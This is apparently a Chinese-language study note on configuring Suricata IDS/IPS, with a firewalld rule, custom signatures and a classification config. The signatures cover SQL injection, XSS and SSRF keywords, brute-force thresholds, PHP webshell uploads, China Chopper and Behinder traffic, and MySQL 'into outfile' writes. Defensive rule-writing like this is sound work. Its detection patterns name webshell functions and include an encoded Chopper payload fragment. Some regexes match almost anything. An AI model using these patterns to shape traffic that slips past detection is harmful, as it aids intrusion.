174.134开启开名单,http只对174.5开放

systemctl start firewalld
firewall-cmd --add-rich-rule='rule family="ipv4" source address="192.168.174.5" port protocol="tcp" port="80" accept'

suricata.rules完整规则

# alert代表触发了就预警
# http为协议,suricata支持tcp,udp,http等常见协议
# any(源IP) any(源端口) ->代表源请求目的 <>请求+响应() $HOME_NET(目标IP) any(目标端口)
# 圆括号里面代表规则匹配,msg为发送的消息
# content表示过滤条件,变量http_stat_code为404
# sid规则id,rev
#alert http any any <> $HOME_NET any (msg: "Web服务器出现404状态码"; content: "404"; http_stat_code; sid: 561001; )

#alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "Web服务器出现404状态码"; content: "404"; http_stat_code; sid: 561002; )
#alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "Web服务器出现404状态码"; content: "404"; http_stat_code; classtype: http-status-404; sid: 561003; )

#alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "Web服务器出现404状态码"; content: "404"; http_stat_code; flowint:urlcount, notset; flowint:urlcount, =, 1; noalert; sid: 561004; )
#alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "Web服务器出现404状态码"; content: "404"; http_stat_code; flowint:urlcount, isset; flowint:urlcount, +, 1; noalert; sid: 561005; )
#alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "Web服务器频繁404状态码"; content: "404"; http_stat_code; flowint:urlcount, >=, 5; priority: 2; sid: 561006; rev: 2; )

#alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "Web服务器频繁404状态码,规则:561007"; content: "404"; http_stat_code; threshold: type threshold, track by_src, count 5, seconds 20; classtype: web-url-scan; sid: 561007; rev: 3; )

#alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "Web服务器400"; content: "400"; http_stat_code; classtype: http-status-error; sid: 600001; rev: 1; )
#alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "Web服务器404"; content: "404"; http_stat_code; classtype: http-status-error; sid: 600002; rev: 1; )
#alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "Web服务器500"; content: "500"; http_stat_code; classtype: http-status-error; sid: 600003; rev: 1; )

#Web页面扫描攻击-状态码
#alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "频繁404,疑似扫描"; content: "404"; http_stat_code; threshold: type threshold, track by_src, count 5, seconds 10; classtype: web-scan-attack; sid: 601001; rev: 1; )

#SQL注入攻击-URI关键字
alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "SQL注入攻击-select"; content: "select"; http_uri; classtype: web-sql-injection; sid: 611000; rev: 1; )
#alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "SQL注入攻击-单引号"; content: "|27|"; http_uri; classtype: web-sql-injection; sid: 611001; rev: 1; )
#alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "SQL注入攻击-双引号"; content: "|22|"; http_uri; classtype: web-sql-injection; sid: 611002; rev: 1; )
#alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "SQL注入攻击-SQL注释"; content: "--"; http_uri; pcre: "/\+*|\s*/i"; classtype: web-sql-injection; sid: 611003; rev: 1; )
#alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "SQL注入攻击POST-SQL注释"; content: "="; http.request_body; pcre: "/\+*|\s*/i"; http.content_type; content: "x-www-form-urlencoded"; classtype: web-sql-injection; sid: 611004; rev: 1; )
#alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "SQL注入攻击-select|union|from"; content: "/"; http_uri; pcre: "/select|union|from|%20and%20/i"; classtype: web-sql-injection; sid: 611005; rev: 1; )
#IPS
drop http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "SQL注入攻击-database()"; content: "database()"; http_uri; classtype: web-sql-injection; sid: 611006; rev: 1; )

#XSS攻击
#alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "XSS-<script"; content: "<script"; http_uri; nocase; classtype: web-xss-attack; sid: 620001; rev: 1; )
#alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "XSS-</script"; content: "</script"; http_uri; nocase; classtype: web-xss-attack; sid: 620002; rev: 1; )
#alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "XSS-javascript"; content: "javascript"; http_uri; nocase; classtype: web-xss-attack; sid: 620003; rev: 1; )
#alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "XSS-alert"; content: "alert"; http_uri; nocase; classtype: web-xss-attack; sid: 620004; rev: 1; )
#alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "XSS-onload="; content: "onload="; http_uri; nocase; classtype: web-xss-attack; sid: 620005; rev: 1; )

#SSRF攻击
#alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "SSRF-file:"; content: "file|3A|"; http_uri; nocase; classtype: web-ssrf-attack; sid: 630001; rev: 1; )
#alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "SSRF-http:"; content: "http|3A|"; http_uri; nocase; classtype: web-ssrf-attack; sid: 630002; rev: 1; )
#alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "SSRF-https:"; content: "https|3A|"; http_uri; nocase; classtype: web-ssrf-attack; sid: 630003; rev: 1; )
#alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "SSRF-dict:"; content: "dict|3A|"; http_uri; nocase; classtype: web-ssrf-attack; sid: 630004; rev: 1; )
#alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "SSRF-gopher:"; content: "gopher|3A|"; http_uri; nocase; classtype: web-ssrf-attack; sid: 630005; rev: 1; )
#alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "SSRF-phar:"; content: "phar|3A|"; http_uri; nocase; classtype: web-ssrf-attack; sid: 630006; rev: 1; )

#登录爆破
#alert http $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg: "Web登录爆破"; content: "login.php"; http_uri; threshold: type threshold, track by_src, count 3, seconds 20; sid: 111111; )
#alert http $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg: "Web登录爆破"; content: "login.html"; http_uri; threshold: type threshold, track by_src, count 3, seconds 20; sid: 111112; )

#文件上传
#alert http $EXTERNAL_NET any -> $HOME_NET $VAUDIT_PORTS (msg: "文件正常上传-1"; filestore; classtype: web-file-upload; sid: 614000; rev: 1; )
#alert http $EXTERNAL_NET any -> $HOME_NET $VAUDIT_PORTS (msg: "文件正常上传-2"; http.method; content: "POST"; http.content_type; content: "multipart/form-data"; http.request_body; content: "Content-Disposition"; filestore; classtype: web-file-upload; sid: 614001; rev: 1; )
#alert http $EXTERNAL_NET any -> $HOME_NET $VAUDIT_PORTS (msg: "PHP木马上传"; content: "<?"; http.content_type; content: "multipart/form-data"; http.request_body; pcre: "/eval|assert|system\(exec|$_POST|$_GET\)/i"; filestore; classtype: web-file-upload; sid: 614002; rev: 1; )
#drop http $EXTERNAL_NET any -> $HOME_NET $VAUDIT_PORTS (msg: "木马上传"; content: "<?"; http.content_type; content: "multipart/form-data"; http.request_body; pcre: "/eval|assert|system\(exec|$_POST|$_GET\)/i"; filestore; classtype: web-file-upload; sid: 614003; rev: 1; )

#菜刀
#alert http $EXTERNAL_NET any <> $HOME_NET $VAUDIT_PORTS (msg: "菜刀连接-响应"; http.response_body; content: "|58 40 59|"; startswith; content: "|58 40 59|"; endswith; sid: 614011; rev: 1; )
#alert http $EXTERNAL_NET any -> $HOME_NET $VAUDIT_PORTS (msg: "菜刀连接-请求"; content: "|61 72 72 61 79 5f 6d 61 70|"; http_client_body; pcre: "/array.+ev.+Al/i"; sid: 614012; rev: 1; )
#alert http $EXTERNAL_NET any -> $HOME_NET $VAUDIT_PORTS (msg: "菜刀连接-base64"; content: "QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZih"; http_client_body; sid: 614013; rev: 1; )

#冰蝎
alert http $EXTERNAL_NET any <> $HOME_NET $VAUDIT_PORTS (msg: "冰蝎连接-user_agent"; content: "Baiduspider"; http_user_agent; sid: 614020; rev: 1; )
alert tcp $EXTERNAL_NET any -> $HOME_NET $VAUDIT_PORTS (msg: "疑似冰蝎流量-长度"; dsize: >1000; sid: 614021; rev: 1; )
alert http $EXTERNAL_NET any -> $HOME_NET $VAUDIT_PORTS (msg: "冰蝎连接-POST前100无等于号"; http.request_body; content: !"="; depth: 100; sid: 614022; rev: 1; )
alert http $EXTERNAL_NET any -> $HOME_NET $VAUDIT_PORTS (msg: "冰蝎连接-POST请求正文为base64"; http.request_body; pcre: "/^[A-Za-z0-9\+\/]{1000,}=*$/"; sid: 614023; rev: 1; )
alert http $EXTERNAL_NET any <> $HOME_NET $VAUDIT_PORTS (msg: "冰蝎连接-POST响应正文为base64"; http.response_body; pcre: "/^[A-Za-z0-9\+\/]{1000,}=*$/"; sid: 614024; rev: 1; )


alert icmp $EXTERNAL_NET any -> $HOME_NET any (msg: "ICMP 5s10次,每次超过48,疑似ICMP泛洪"; dsize: >48; threshold: type threshold, track by_src, count 10, seconds 5; sid: 620000; rev: 1; )
alert icmp $EXTERNAL_NET any -> $HOME_NET any (msg: "疑似建立ICMP隧道"; dsize: 106; sid: 620001; rev: 1; )

#alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg: "TCP泛洪"; flow: established, to_server; threshold: type threshold, track by_src, count 5, seconds 10; sid: 621000; rev: 1; )
#alert tcp $EXTERNAL_NET 10000 -> $HOME_NET 0:1023 (msg: "SYN泛洪"; flags:S; flow: to_server; dsize:>100; threshold: type both, count 5, seconds 10, track by_src; sid: 621001; rev: 1; )


#MYSQL
alert tcp $EXTERNAL_NET any <> $HOME_NET $MYSQL_PORTS (msg: "MYSQL登录失败-直接匹配"; content: "Access denied for user"; nocase; sid: 630000; rev: 1; )
alert tcp $EXTERNAL_NET any <> $HOME_NET $MYSQL_PORTS (msg: "MYSQL登录失败-直接匹配-10s失败3次"; content: "Access denied for user"; nocase; threshold: type threshold, track by_src, count 3, seconds 10; sid: 630001; rev: 1; )
alert tcp $EXTERNAL_NET any <> $HOME_NET $MYSQL_PORTS (msg: "MYSQL登录失败-16进制匹配"; content: "|41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72|"; nocase; sid: 630002; rev: 1; )
alert tcp $EXTERNAL_NET any <> $HOME_NET $MYSQL_PORTS (msg: "MYSQL登录失败-直接匹配-10s失败3次"; content: "|41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72|"; nocase; threshold: type threshold, track by_src, count 3, seconds 10; sid: 630003; rev: 1; )
drop tcp $EXTERNAL_NET any <> $HOME_NET $MYSQL_PORTS (msg: "MYSQL登录失败-直接匹配-10s失败5次"; content: "|41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72|"; nocase; threshold: type threshold, track by_src, count 3, seconds 10; sid: 630004; rev: 1; )
#MYSQL写入木马
alert tcp $EXTERNAL_NET any -> $HOME_NET $MYSQL_PORTS (msg: "MYSQL写入木马"; content: "into outfile"; nocase; pcre: "/system|eval|assert|$_GET|$_POST/i"; sid: 630005; rev: 1; )

#SSH登录失败
alert ssh $EXTERNAL_NET any <> $HOME_NET $SSH_PORTS (msg: "SSH登录"; content: "|15 00 00 00 00 00 00 00 00 00 00|"; nocase; sid: 640000; rev: 1; )
alert ssh $EXTERNAL_NET any <> $HOME_NET $SSH_PORTS (msg: "SSH爆破"; content: "|15 00 00 00 00 00 00 00 00 00 00|"; nocase; threshold: type threshold, track by_src, count 3, seconds 10; sid: 640001; rev: 1; )

classification.config完整定级

# HTTP Protocol
config classification: http-status-404, Web服务器出现404, 4
config classification: web-url-scan, 疑似出现url爬虫扫描,2

# 用户自定义
config classification: http-status-error, Web服务器状态异常, 4
config classification: web-scan-attack, Web页面扫描攻击, 2
config classification: web-sql-injection, SQL注入攻击, 1
config classification: web-xss-attack, XSS攻击, 2
config classification: web-ssrf-attack, SSRF请求伪造攻击, 2
config classification: web-shell-attack, 站点木马植入, 1
config classification: web-file-upload, 文件上传异常, 2
config classification: web-other-alert, 服务器潜在风险, 2

suricata规则示例

\suricata\rules\

suricata能帮我们解决的问题?

1.监控。串行在网络中,或者流量镜像,目标主要是从入和出的网络流量中分析特征(请求头、请求正文等),和wazuh不同的是,可以在事前进行一些响应,更偏向于IPS
2.规则。根据规则对流量特征进行匹配
3.响应。根据规则结果进行reject、alert、drop等操作